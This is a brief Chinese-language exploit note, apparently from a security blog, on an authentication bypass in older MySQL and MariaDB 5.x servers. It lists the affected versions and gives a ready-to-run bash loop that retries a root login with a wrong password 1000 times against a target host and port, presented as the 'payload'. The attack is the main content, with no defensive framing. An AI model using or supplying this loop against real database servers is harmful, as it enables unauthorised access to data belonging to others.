前言
MySQL通过反复使用错误的密码登录,实现MySQL未授权访问
漏洞利用前提
- MySQL除了以下版本以外的其他5.x版本:5.1.63、5.5.24、5.6.6
- MariaDB除了以下版本以外的其他5.x版本:5.1.62、5.2.12、5.3.6、5.5.23
payload
<host>:目标MySQL地址
<port>:目标MySQL端口
1
| for i in {1..1000}; do mysql -uroot -proot -h<host> -P<port>; done
|
完成
参考文献
哔哩哔哩——xiaodisec